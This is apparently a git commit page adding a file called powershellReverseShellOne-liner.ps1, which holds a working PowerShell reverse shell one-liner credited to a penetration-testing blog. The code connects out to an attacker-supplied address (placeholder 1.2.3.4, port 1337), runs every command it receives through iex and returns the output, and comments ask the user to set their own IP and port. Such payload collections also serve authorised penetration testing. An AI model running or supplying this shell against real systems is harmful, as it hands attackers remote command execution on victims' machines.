Create powershellReverseShellOne-liner.ps1
updated folder, misspelled commandInjectionpull/468/head
parent
e985ed3a61
commit
cea9eb46ef
|
@ -0,0 +1,5 @@
|
|||
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
|
||||
# CONFIGURATION
|
||||
# REQUIRED - Provide IP and Port used for Example
|
||||
# DEFINE #MY_TARGET_IP and Port after TCPClient(
|
||||
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
Loading…
Reference in New Issue